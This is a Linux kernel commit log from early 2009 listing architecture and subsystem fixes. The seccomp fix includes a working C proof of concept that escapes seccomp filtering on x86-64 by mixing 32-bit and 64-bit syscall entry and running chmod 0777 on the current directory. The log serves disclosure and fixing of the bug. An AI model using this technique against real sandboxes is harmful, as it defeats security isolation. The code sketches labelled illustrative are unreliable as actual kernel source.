1. 08 Mar 2009: 1 commit
  2. 04 Mar 2009: 1 commit
  3. 03 Mar 2009: 6 commits
    • [ARM] 5417/1: Set the correct cacheid for ARMv6 CPUs with ARMv7 style MMU · b57ee99f
      Committed by Catalin Marinas
      The cacheid_init() function assumes that if cpu_architecture() returns
      7, the caches are VIPT_NONALIASING. The cpu_architecture() function
      returns the version of the supported MMU features (e.g. TEX remapping)
      but it doesn't make any assumptions about the cache type. The patch adds
      a check of the Cache Type Register for the ARMv7 format.
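
      A minimal sketch of the check, assuming the standard CP15 encodings
      from the ARM ARM (names here are illustrative, not the kernel's):

      	/* read the Cache Type Register (CTR) via CP15 */
      	static inline unsigned int read_cache_type(void)
      	{
      		unsigned int ctr;

      		asm("mrc p15, 0, %0, c0, c0, 1" : "=r" (ctr));
      		return ctr;
      	}

      	/* CTR bits [31:29] give the register format; 0x4 marks the
      	 * ARMv7 layout, which is checked independently of the MMU
      	 * version that cpu_architecture() reports */
      	#define CTR_FORMAT_ARMV7(ctr)	((((ctr) >> 29) & 7) == 4)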
      Signed-off-by: Catalin Marinas <catalin.marinas@arm.com>
      Signed-off-by: Russell King <rmk+kernel@arm.linux.org.uk>
    • [ARM] 5416/1: Use unused address in v6_early_abort · 25ef4a67
      Committed by Seth Forshee
      The target of the strex instruction used to clear the exclusive
      monitor is currently the top of the stack.  If the store succeeds,
      this corrupts r0 in pt_regs.  Use the next stack location instead
      of the current one to prevent any chance of corrupting an in-use
      address.
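
      The idea, sketched as inline assembly (an illustration, not the
      kernel's abort-handler code):

      	static inline void clear_exclusive_monitor(void)
      	{
      		unsigned long status, scratch;

      		asm volatile(
      			"sub	%1, sp, #4\n\t"		/* unused slot below sp */
      			"strex	%0, %1, [%1]\n\t"	/* dummy store clears the monitor */
      			: "=&r" (status), "=&r" (scratch)
      			: : "memory");
      	}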
      Signed-off-by: Seth Forshee <seth.forshee@gmail.com>
      Signed-off-by: Russell King <rmk+kernel@arm.linux.org.uk>
    • x86: oprofile: don't set counter width from cpuid on Core2 · 780eef94
      Committed by Tim Blechmann
      Impact: fix stuck NMIs and non-working oprofile on certain CPUs
      
      Resetting the counter width of the performance counters on Intel's
      Core2 CPUs breaks the delivery of NMIs when running in x86_64 mode.
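
      Why the width matters, in a small standalone sketch (not the
      oprofile code itself): a PMC raises its NMI on overflow, so it is
      preloaded with the two's complement of the desired count within
      the real counter width; computing that value with the wrong width
      yields a counter that never overflows.

      	#include <stdint.h>

      	/* reload value for a 'width'-bit counter (width < 64) that
      	 * should overflow, and thus fire an NMI, after 'count' events */
      	static uint64_t pmc_reload(uint64_t count, unsigned int width)
      	{
      		return (0 - count) & ((UINT64_C(1) << width) - 1);
      	}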
      
      This should fix bug #12395:
      
        http://bugzilla.kernel.org/show_bug.cgi?id=12395
      Signed-off-by: Tim Blechmann <tim@klingt.org>
      Signed-off-by: Robert Richter <robert.richter@amd.com>
      LKML-Reference: <20090303100412.GC10085@erda.amd.com>
      Cc: <stable@kernel.org>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • x86: fix init_memory_mapping() to handle small ranges · 0fc59d3a
      Committed by Yinghai Lu
      Impact: fix failed EFI bootup in certain circumstances
      
      Ying Huang found that init_memory_mapping() has a problem with small
      ranges (less than 2M) when he tried to direct-map the EFI runtime
      code out of max_low_pfn_mapped.
      
      It turns out we never considered that case and didn't check the range...
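
      The shape of the fix, sketched with illustrative helper names
      (map_with_4k_pages() and map_with_2m_pages() are hypothetical
      stand-ins for the kernel's page-table setup):

      	#define PMD_SIZE	(2UL << 20)	/* 2M large-page unit */

      	static void map_with_4k_pages(unsigned long s, unsigned long e) { /* ... */ }
      	static void map_with_2m_pages(unsigned long s, unsigned long e) { /* ... */ }

      	static void map_range(unsigned long start, unsigned long end)
      	{
      		unsigned long big_start = (start + PMD_SIZE - 1) & ~(PMD_SIZE - 1);
      		unsigned long big_end = end & ~(PMD_SIZE - 1);

      		if (big_start >= big_end) {
      			/* whole range smaller than one aligned 2M unit:
      			 * the case that used to fall through the cracks;
      			 * it must be mapped with 4K pages */
      			map_with_4k_pages(start, end);
      			return;
      		}
      		map_with_4k_pages(start, big_start);	/* unaligned head */
      		map_with_2m_pages(big_start, big_end);
      		map_with_4k_pages(big_end, end);	/* unaligned tail */
      	}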
      Reported-by: Ying Huang <ying.huang@intel.com>
      Signed-off-by: Yinghai Lu <yinghai@kernel.org>
      Cc: Brian Maly <bmaly@redhat.com>
      LKML-Reference: <49ACDDED.1060508@kernel.org>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • x86-64: seccomp: fix 32/64 syscall hole · 5b101740
      Committed by Roland McGrath
      On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
      ljmp, and then use the "syscall" instruction to make a 64-bit system
      call.  A 64-bit process makes a 32-bit system call with int $0x80.
      
      In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
      the wrong system call number table.  The fix is simple: test TS_COMPAT
      instead of TIF_IA32.  Here is an example exploit:
      
      	/* test case for seccomp circumvention on x86-64
      
      	   There are two failure modes: compile with -m64 or compile with -m32.
      
      	   The -m64 case is the worst one, because it does "chmod 777 ." (could
      	   be any chmod call).  The -m32 case demonstrates it was able to do
      	   stat(), which can glean information but not harm anything directly.
      
      	   A buggy kernel will let the test do something, print, and exit 1; a
      	   fixed kernel will make it exit with SIGKILL before it does anything.
      	*/
      
      	#define _GNU_SOURCE
      	#include <assert.h>
      	#include <inttypes.h>
      	#include <stdio.h>
      	#include <linux/prctl.h>
      	#include <sys/stat.h>
      	#include <unistd.h>
      	#include <asm/unistd.h>
      
      	int
      	main (int argc, char **argv)
      	{
      	  char buf[100];
      	  static const char dot[] = ".";
      	  long ret;
      	  unsigned st[24];
      
      	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
      	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
      
      	#ifdef __x86_64__
      	  assert ((uintptr_t) dot < (1UL << 32));
      	  asm ("int $0x80 # %0 <- %1(%2 %3)"
      	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
      	  ret = snprintf (buf, sizeof buf,
      			  "result %ld (check mode on .!)\n", ret);
      	#elif defined __i386__
      	  asm (".code32\n"
      	       "pushl %%cs\n"
      	       "pushl $2f\n"
      	       "ljmpl $0x33, $1f\n"
      	       ".code64\n"
      	       "1: syscall # %0 <- %1(%2 %3)\n"
      	       "lretl\n"
      	       ".code32\n"
      	       "2:"
      	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
      	  if (ret == 0)
      	    ret = snprintf (buf, sizeof buf,
      			    "stat . -> st_uid=%u\n", st[7]);
      	  else
      	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
      	#else
      	# error "not this one"
      	#endif
      
      	  write (1, buf, ret);
      
      	  syscall (__NR_exit, 1);
      	  return 2;
      	}
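
      A sketch of the fix described above (field access per kernels of
      that era; treat it as illustrative rather than the exact diff):

      	/* TS_COMPAT is set per syscall entry (int $0x80), while
      	 * TIF_IA32 only records the process personality chosen at
      	 * exec time -- so the table must be picked from TS_COMPAT */
      	static int seccomp_syscall_is_32bit(void)
      	{
      	#ifdef CONFIG_COMPAT
      		return task_thread_info(current)->status & TS_COMPAT;
      	#else
      		return 0;
      	#endif
      	}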
      Signed-off-by: Roland McGrath <roland@redhat.com>
      [ I don't know if anybody actually uses seccomp, but it's enabled in
        at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
      Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
    • x86-64: syscall-audit: fix 32/64 syscall hole · ccbe495c
      Committed by Roland McGrath
      On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
      ljmp, and then use the "syscall" instruction to make a 64-bit system
      call.  A 64-bit process makes a 32-bit system call with int $0x80.
      
      In both these cases, audit_syscall_entry() will use the wrong system
      call number table and the wrong system call argument registers.  This
      could be used to circumvent a syscall audit configuration that filters
      based on the syscall numbers or argument details.
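
      The corresponding selection for auditing, sketched with the pt_regs
      field names of that era (regs is the syscall entry's register
      frame; treat the snippet as illustrative):

      	if (task_thread_info(current)->status & TS_COMPAT)
      		audit_syscall_entry(AUDIT_ARCH_I386, regs->orig_ax,
      				    regs->bx, regs->cx, regs->dx, regs->si);
      	else
      		audit_syscall_entry(AUDIT_ARCH_X86_64, regs->orig_ax,
      				    regs->di, regs->si, regs->dx, regs->r10);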
      Signed-off-by: Roland McGrath <roland@redhat.com>
      Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
  4. 02 Mar 2009: 7 commits
    • x86 mmiotrace: fix race with release_kmmio_fault_page() · 340430c5
      Committed by Pekka Paalanen
      There was a theoretical possibility of a race between arming a page in
      post_kmmio_handler() and disarming the page in
      release_kmmio_fault_page():
      
      cpu0                             cpu1
      ------------------------------------------------------------------
      mmiotrace shutdown
      enter release_kmmio_fault_page
                                       fault on the page
                                       disarm the page
      disarm the page
                                       handle the MMIO access
                                       re-arm the page
      put the page on release list
      remove_kmmio_fault_pages()
                                       fault on the page
                                       page not known to mmiotrace
                                       fall back to do_page_fault()
                                       *KABOOM*
      
      (This scenario also shows the double disarm case which is allowed.)
      
      Fixed by acquiring kmmio_lock in post_kmmio_handler() and checking
      if the page is being released from mmiotrace.
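
      A sketch of the locking described above (kmmio_lock is the real
      lock; the scheduled_for_release flag and helper names are
      illustrative):

      	static void post_kmmio_rearm(struct kmmio_fault_page *f)
      	{
      		unsigned long flags;

      		spin_lock_irqsave(&kmmio_lock, flags);
      		/* never re-arm a page that release_kmmio_fault_page()
      		 * has already queued for release, or a later fault on
      		 * it falls through to do_page_fault() and oopses */
      		if (!f->scheduled_for_release)
      			arm_kmmio_fault_page(f);
      		spin_unlock_irqrestore(&kmmio_lock, flags);
      	}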
      Signed-off-by: Pekka Paalanen <pq@iki.fi>
      Cc: Stuart Bennett <stuart@freedesktop.org>
      Cc: Steven Rostedt <rostedt@goodmis.org>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • x86 mmiotrace: improve handling of secondary faults · 3e39aa15
      Committed by Stuart Bennett
      Upgrade some kmmio.c debug messages to warnings.
      Allow secondary faults on probed pages to fall through, and only log
      secondary faults that are not due to non-present pages.
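
      Roughly, the handler's policy becomes (helper names here are
      illustrative, not kmmio.c's):

      	/* secondary fault on a probed page: if it is not explained
      	 * by the page being disarmed (non-present), warn; either
      	 * way let the normal fault path resolve it */
      	if (is_secondary_fault(f)) {
      		if (!fault_on_nonpresent_page(error_code))
      			pr_warning("kmmio: unexpected secondary fault\n");
      		return 0;	/* fall through to do_page_fault() */
      	}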
      
      Patch edited by Pekka Paalanen.
      Signed-off-by: Stuart Bennett <stuart@freedesktop.org>
      Signed-off-by: Pekka Paalanen <pq@iki.fi>
      Cc: Steven Rostedt <rostedt@goodmis.org>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • x86 mmiotrace: split set_page_presence() · 0b700a6a
      Committed by Pekka Paalanen
      Split set_page_presence() in kmmio.c into two new functions,
      set_pmd_presence() and set_pte_presence(). Purely code
      reorganization, no functional changes.
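
      The shape of the split, sketched with the standard x86 pagetable
      helpers (illustrative and behavior-preserving):

      	static void set_pmd_presence(pmd_t *pmd, bool present)
      	{
      		pmdval_t v = pmd_val(*pmd) & ~_PAGE_PRESENT;

      		set_pmd(pmd, __pmd(present ? v | _PAGE_PRESENT : v));
      	}

      	static void set_pte_presence(pte_t *pte, bool present)
      	{
      		pteval_t v = pte_val(*pte) & ~_PAGE_PRESENT;

      		set_pte_atomic(pte, __pte(present ? v | _PAGE_PRESENT : v));
      	}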
      Signed-off-by: Pekka Paalanen <pq@iki.fi>
      Cc: Stuart Bennett <stuart@freedesktop.org>
      Cc: Steven Rostedt <rostedt@goodmis.org>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • x86 mmiotrace: fix save/restore page table state · 5359b585
      Committed by Pekka Paalanen
      Blindly setting _PAGE_PRESENT in disarm_kmmio_fault_page() overlooks
      the possibility that the page was not present when it was armed.
      
      Make arm_kmmio_fault_page() store the previous page presence in struct
      kmmio_fault_page and use it on disarm.
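
      In outline (helper and field names are illustrative):

      	struct kmmio_fault_page {
      		unsigned long page;
      		bool old_presence;	/* presence before arming */
      	};

      	static void arm_page(struct kmmio_fault_page *f)
      	{
      		f->old_presence = page_is_present(f->page);
      		set_page_presence(f->page, false);
      	}

      	static void disarm_page(struct kmmio_fault_page *f)
      	{
      		/* restore the saved state instead of forcing
      		 * _PAGE_PRESENT back on unconditionally */
      		set_page_presence(f->page, f->old_presence);
      	}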
      
      This patch was originally written by Stuart Bennett, but Pekka
      Paalanen rewrote it somewhat differently.
      Signed-off-by: Pekka Paalanen <pq@iki.fi>
      Cc: Stuart Bennett <stuart@freedesktop.org>
      Cc: Steven Rostedt <rostedt@goodmis.org>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • x86 mmiotrace: WARN_ONCE if dis/arming a page fails · e9d54cae
      Committed by Stuart Bennett
      Print a full warning once, if arming or disarming a page fails.
      
      Also, if initial arming fails, do not handle the page further. This
      avoids the possibility of a page failing to arm and then later claiming
      to have handled any fault on that page.
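
      Approximately (the release helper is an illustrative name):

      	if (arm_kmmio_fault_page(f)) {
      		WARN_ONCE(1, "kmmio: arming 0x%08lx failed, dropping the probe\n",
      			  f->page);
      		forget_fault_page(f);	/* illustrative: stop tracking it */
      	}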
      
      WARN_ONCE added by Pekka Paalanen.
      Signed-off-by: Stuart Bennett <stuart@freedesktop.org>
      Signed-off-by: Pekka Paalanen <pq@iki.fi>
      Cc: Steven Rostedt <rostedt@goodmis.org>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • x86: add far read test to testmmiotrace · 5ff93697
      Committed by Pekka Paalanen
      Apparently pages far into an ioremapped region might not actually be
      mapped during ioremap(). Add an optional read test to try to trigger a
      multiply faulting MMIO access. Also add more messages to the kernel log
      to help debugging.
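
      The shape of the added test, sketched (the real test is a kernel
      module; names are illustrative):

      	static void far_read_test(unsigned long mmio_start, size_t size)
      	{
      		void __iomem *p = ioremap_nocache(mmio_start, size);

      		if (!p)
      			return;
      		/* touch the last word of the mapping: it may not have
      		 * been populated at ioremap() time, so this access can
      		 * fault more than once on its way through mmiotrace */
      		pr_info("testmmiotrace: far read gave 0x%08x\n",
      			ioread32(p + size - 4));
      		iounmap(p);
      	}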
      
      This patch is based on a patch suggested by
      Stuart Bennett <stuart@freedesktop.org>
      who discovered bugs in mmiotrace related to normal kernel space faults.
      Signed-off-by: Pekka Paalanen <pq@iki.fi>
      Cc: Stuart Bennett <stuart@freedesktop.org>
      Cc: Steven Rostedt <rostedt@goodmis.org>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • x86: count errors in testmmiotrace.ko · fab852aa
      Committed by Pekka Paalanen
      Check the read values against the written values in the MMIO read/write
      test. This test shows if the given MMIO test area really works as
      memory, which is a prerequisite for a successful mmiotrace test.
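
      The check, sketched (p is the ioremapped test area; treat the
      snippet as illustrative):

      	static unsigned int check_mmio_area(void __iomem *p, size_t size)
      	{
      		unsigned int i, errors = 0;

      		for (i = 0; i < size; i += 4) {
      			iowrite32(i, p + i);
      			if (ioread32(p + i) != i)
      				errors++;	/* area does not act as memory */
      		}
      		return errors;
      	}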
      Signed-off-by: Pekka Paalanen <pq@iki.fi>
      Cc: Stuart Bennett <stuart@freedesktop.org>
      Cc: Steven Rostedt <rostedt@goodmis.org>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
  5. 28 Feb 2009: 6 commits
  6. 27 Feb 2009: 15 commits
  7. 26 Feb 2009: 4 commits
    • crypto: api - Fix module load deadlock with fallback algorithms · a760a665
      Committed by Herbert Xu
      With the mandatory algorithm testing at registration, we have now
      created a deadlock for algorithms that require fallbacks.  This can
      happen if the module containing such an algorithm is loaded before
      its fallback module.  The system will then try to test the new
      algorithm, find that it needs to load a fallback, and then try to
      load that.
      
      As both algorithms share the same module alias, it can attempt
      to load the original algorithm again and block indefinitely.
      
      As algorithms requiring fallbacks are a special case, we can fix
      this by giving them a different module alias than the rest.  Then
      it's just a matter of using the right aliases according to what
      algorithms we're trying to find.
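
      Conceptually (the exact alias scheme here is illustrative): a
      driver that needs a fallback advertises a distinct alias, so
      loading its fallback can never resolve back to the driver itself.

      	/* driver whose "aes" implementation needs a software fallback: */
      	MODULE_ALIAS("aes-all");	/* distinct from the plain "aes" alias */

      	/* conceptual lookup (want_fallback_capable is an illustrative
      	 * flag): request the "-all" alias only when a fallback-needing
      	 * driver is acceptable; when resolving the fallback itself,
      	 * request only the plain name, so the request cannot loop back
      	 * into the module that is still under test */
      	request_module(want_fallback_capable ? "%s-all" : "%s", name);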
      Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
    • powerpc: Fix 64bit __copy_tofrom_user() regression · f72b728b
      Committed by Mark Nelson
      This fixes a regression introduced by commit
      a4e22f02 ("powerpc: Update 64bit
      __copy_tofrom_user() using CPU_FTR_UNALIGNED_LD_STD").
      
      The same bug that existed in the 64bit memcpy() also exists here, so
      fix it here too. The fix is the same as that applied to memcpy(), with the
      addition of fixes for the exception handling code required for
      __copy_tofrom_user().
      
      This stops us reading beyond the end of the source region we were told
      to copy.
      Signed-off-by: Mark Nelson <markn@au1.ibm.com>
      Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
    • powerpc: Fix 64bit memcpy() regression · e423b9ec
      Committed by Mark Nelson
      This fixes a regression introduced by commit
      25d6e2d7 ("powerpc: Update 64bit memcpy()
      using CPU_FTR_UNALIGNED_LD_STD").
      
      This commit allowed CPUs that have the CPU_FTR_UNALIGNED_LD_STD CPU
      feature bit present to do the memcpy() with unaligned load doubles. But,
      along with this came a bug where our final load double would read bytes
      beyond a page boundary and into the next (unmapped) page. This was caught
      by enabling CONFIG_DEBUG_PAGEALLOC.
      
      The fix was to read only the number of bytes that we need to store rather
      than reading a full 8-byte doubleword and storing only a portion of that.
      
      In order to minimise the amount of existing code touched we use the
      original do_tail for the src_unaligned case.
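
      The fix in C terms, as a sketch (the real code is powerpc
      assembly):

      	/* copy the final partial doubleword one byte at a time, so
      	 * the source access never extends past src + n and cannot
      	 * touch the next, possibly unmapped, page */
      	static void copy_tail(unsigned char *dst, const unsigned char *src,
      			      unsigned long n)
      	{
      		while (n--)
      			*dst++ = *src++;
      	}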
      
      Below is an example of the regression, as reported by Sachin Sant:
      
      Unable to handle kernel paging request for data at address 0xc00000003f380000
      Faulting instruction address: 0xc000000000039574
      cpu 0x1: Vector: 300 (Data Access) at [c00000003baf3020]
          pc: c000000000039574: .memcpy+0x74/0x244
          lr: d00000000244916c: .ext3_xattr_get+0x288/0x2f4 [ext3]
          sp: c00000003baf32a0
         msr: 8000000000009032
         dar: c00000003f380000
       dsisr: 40000000
        current = 0xc00000003e54b010
        paca    = 0xc000000000a53680
          pid   = 1840, comm = readahead
      enter ? for help
      [link register   ] d00000000244916c .ext3_xattr_get+0x288/0x2f4 [ext3]
      [c00000003baf32a0] d000000002449104 .ext3_xattr_get+0x220/0x2f4 [ext3]
      (unreliable)
      [c00000003baf3390] d00000000244a6e8 .ext3_xattr_security_get+0x40/0x5c [ext3]
      [c00000003baf3400] c000000000148154 .generic_getxattr+0x74/0x9c
      [c00000003baf34a0] c000000000333400 .inode_doinit_with_dentry+0x1c4/0x678
      [c00000003baf3560] c00000000032c6b0 .security_d_instantiate+0x50/0x68
      [c00000003baf35e0] c00000000013c818 .d_instantiate+0x78/0x9c
      [c00000003baf3680] c00000000013ced0 .d_splice_alias+0xf0/0x120
      [c00000003baf3720] d00000000243e05c .ext3_lookup+0xec/0x134 [ext3]
      [c00000003baf37c0] c000000000131e74 .do_lookup+0x110/0x260
      [c00000003baf3880] c000000000134ed0 .__link_path_walk+0xa98/0x1010
      [c00000003baf3970] c0000000001354a0 .path_walk+0x58/0xc4
      [c00000003baf3a20] c000000000135720 .do_path_lookup+0x138/0x1e4
      [c00000003baf3ad0] c00000000013645c .path_lookup_open+0x6c/0xc8
      [c00000003baf3b70] c000000000136780 .do_filp_open+0xcc/0x874
      [c00000003baf3d10] c0000000001251e0 .do_sys_open+0x80/0x140
      [c00000003baf3dc0] c00000000016aaec .compat_sys_open+0x24/0x38
      [c00000003baf3e30] c00000000000855c syscall_exit+0x0/0x40
      Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
    • powerpc: Fix load/store float double alignment handler · 49f297f8
      Committed by Michael Neuling
      When we introduced VSX, we changed the way FPRs are stored in the
      thread_struct.  Unfortunately we missed the load/store float double
      alignment handler code when updating how we access FPRs in the
      thread_struct.
      
      The change below fixes this and merges the little- and big-endian cases.
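
      The gist, sketched with the TS_FPR() accessor from the era's
      headers (treat the snippet as illustrative): with VSX, each FPR
      shares a 128-bit slot with a VSR half, so the handler must go
      through the accessor instead of indexing a flat array of doubles.

      	/* before: assumed thread_struct.fpr was a plain double[32] */
      	current->thread.fpr[reg] = val;

      	/* after: index through the layout-aware accessor */
      	current->thread.TS_FPR(reg) = val;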
      Signed-off-by: Michael Neuling <mikey@neuling.org>
      Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>